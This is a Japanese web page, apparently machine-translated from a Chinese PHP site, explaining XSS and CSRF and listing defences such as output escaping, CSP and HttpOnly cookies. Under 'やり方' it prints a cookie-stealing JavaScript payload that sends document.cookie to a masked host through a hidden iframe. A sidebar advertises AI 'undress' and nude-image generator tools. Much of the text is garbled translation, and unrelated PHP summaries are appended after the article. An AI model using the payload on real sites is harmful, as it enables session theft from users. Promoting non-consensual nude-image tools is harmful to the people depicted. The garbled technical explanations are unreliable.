XSS: クロスサイト スクリプティング (XSS とも呼ばれる) は、Web サイト アプリケーションに対するセキュリティ脆弱性攻撃であり、コード インジェクションの一種です。これにより、悪意のあるユーザーが Web ページにコードを挿入することができ、Web ページを閲覧している他のユーザーに影響を及ぼします。このタイプの攻撃には通常、HTML とユーザー側のスクリプト言語が関係します。
CSRF: クロスサイト リクエスト フォージェリ (英語: Cross-site request forgery)、ワンクリック攻撃またはセッションライディングとも呼ばれ、通常は CSRF または意図しない操作を実行する攻撃手法です。
簡単に理解すると:
XSS: クライアント側のスクリプト言語 (JavaScript などの最も一般的なもの) を介して
悪意のある JavaScript コードをフォーラム投稿に公開することは、このコードのコンテンツが外部サーバー、それは XSS と呼ばれます。
CSRF: XSRF とも呼ばれ、ユーザーになりすまして (ユーザーの知らないうちに) リクエストを開始し、ユーザーの希望に反して一部のリクエスト (悪意のある投稿、投稿の削除、パスワードの変更、電子メールの送信など) を完了します。 。)。
やり方
// 用 <script type="text/javascript"></script> 包起来放在评论中 (function(window, document) { // 构造泄露信息用的 URL var cookies = document.cookie; var xssURIBase = "http://********"; var xssURI = xssURIBase + window.encodeURI(cookies); // 建立隐藏 iframe 用于通讯 var hideFrame = document.createElement("iframe"); hideFrame.height = 0; hideFrame.width = 0; hideFrame.style.display = "none"; hideFrame.src = xssURI; // 开工 document.body.appendChild(hideFrame); })(window, document);
保護方法
中心的な考え方: 外部ソースからのすべてのデータは、ページに表示される前にサーバー コードでフィルターされる必要があります。つまり、すべての外部データは必ず違法です。フィルタリングをうまくやってください。
1. innerText (IE) と textContent (Firefox)、つまり jQuery の text() を使用してテキストコンテンツを出力してみます
2. innerHTML やその他の関数を使用する必要がある場合は、php の htmlspecialchars と同様のフィルタリングを行う必要があります
3 .html出力時に、コンテンツセキュリティポリシーのHTTPヘッダーを追加します
(機能: XSS、サードパーティスクリプトファイルの埋め込みなどによるページの攻撃を防ぐことができます)
(欠点: IE 以前のバージョンのブラウザでは、サポートしていません)
4. Cookieを設定する場合、HttpOnlyパラメータを追加します
(機能: XSSによるページ攻撃時にCookie情報が盗まれるのを防ぐことができ、IE6と互換性があります)
(欠点: のJSコードウェブサイト自体はCookieを操作できず、限定的であり、Cookieのセキュリティのみを保証します)
5. API開発時にリクエストのRefererパラメータを確認する
(機能: CSRF攻撃をある程度防ぐことができます)
(欠点) : IE 以前のバージョンのブラウザでは、Referer パラメーターが偽造される可能性があります)
関連する推奨事項:
クロスサイトおよびクロスサイトを防ぐための PHP 実装サンプル コード
以上がXSS および CSRF 攻撃から保護する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

PHP and Python each have their own advantages, and the choice should be based on project requirements. 1.PHPは、シンプルな構文と高い実行効率を備えたWeb開発に適しています。 2。Pythonは、簡潔な構文とリッチライブラリを備えたデータサイエンスと機械学習に適しています。

PHPは死にかけていませんが、常に適応して進化しています。 1)PHPは、1994年以来、新しいテクノロジーの傾向に適応するために複数のバージョンの反復を受けています。 2)現在、電子商取引、コンテンツ管理システム、その他の分野で広く使用されています。 3)PHP8は、パフォーマンスと近代化を改善するために、JITコンパイラおよびその他の機能を導入します。 4)Opcacheを使用してPSR-12標準に従って、パフォーマンスとコードの品質を最適化します。

PHPの将来は、新しいテクノロジーの傾向に適応し、革新的な機能を導入することで達成されます。1)クラウドコンピューティング、コンテナ化、マイクロサービスアーキテクチャに適応し、DockerとKubernetesをサポートします。 2)パフォーマンスとデータ処理の効率を改善するために、JITコンパイラと列挙タイプを導入します。 3)パフォーマンスを継続的に最適化し、ベストプラクティスを促進します。

PHPでは、特性は方法が必要な状況に適していますが、継承には適していません。 1)特性により、クラスの多重化方法が複数の継承の複雑さを回避できます。 2)特性を使用する場合、メソッドの競合に注意を払う必要があります。メソッドの競合は、代替およびキーワードとして解決できます。 3)パフォーマンスを最適化し、コードメンテナビリティを改善するために、特性の過剰使用を避け、その単一の責任を維持する必要があります。

依存関係噴射コンテナ(DIC)は、PHPプロジェクトで使用するオブジェクト依存関係を管理および提供するツールです。 DICの主な利点には、次のものが含まれます。1。デカップリング、コンポーネントの独立したもの、およびコードの保守とテストが簡単です。 2。柔軟性、依存関係を交換または変更しやすい。 3.テスト可能性、単体テストのために模擬オブジェクトを注入するのに便利です。

SplfixedArrayは、PHPの固定サイズの配列であり、高性能と低いメモリの使用が必要なシナリオに適しています。 1)動的調整によって引き起こされるオーバーヘッドを回避するために、作成時にサイズを指定する必要があります。 2)C言語アレイに基づいて、メモリと高速アクセス速度を直接動作させます。 3)大規模なデータ処理とメモリに敏感な環境に適していますが、サイズが固定されているため、注意して使用する必要があります。

PHPは、$ \ _ファイル変数を介してファイルのアップロードを処理します。セキュリティを確保するための方法には次のものが含まれます。1。アップロードエラー、2。ファイルの種類とサイズを確認する、3。ファイル上書きを防ぐ、4。ファイルを永続的なストレージの場所に移動します。

JavaScriptでは、nullcoalescingoperator(??)およびnullcoalescingsignmentoperator(?? =)を使用できます。 1.??最初の非潜水金または非未定されたオペランドを返します。 2.??これらの演算子は、コードロジックを簡素化し、読みやすさとパフォーマンスを向上させます。


ホットAIツール

Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。

Undress AI Tool
脱衣画像を無料で

Clothoff.io
AI衣類リムーバー

AI Hentai Generator
AIヘンタイを無料で生成します。

人気の記事

ホットツール

VSCode Windows 64 ビットのダウンロード
Microsoft によって発売された無料で強力な IDE エディター

SublimeText3 英語版
推奨: Win バージョン、コードプロンプトをサポート!

ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境

mPDF
mPDF は、UTF-8 でエンコードされた HTML から PDF ファイルを生成できる PHP ライブラリです。オリジナルの作者である Ian Back は、Web サイトから「オンザフライ」で PDF ファイルを出力し、さまざまな言語を処理するために mPDF を作成しました。 HTML2FPDF などのオリジナルのスクリプトよりも遅く、Unicode フォントを使用すると生成されるファイルが大きくなりますが、CSS スタイルなどをサポートし、多くの機能強化が施されています。 RTL (アラビア語とヘブライ語) や CJK (中国語、日本語、韓国語) を含むほぼすべての言語をサポートします。ネストされたブロックレベル要素 (P、DIV など) をサポートします。

SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)
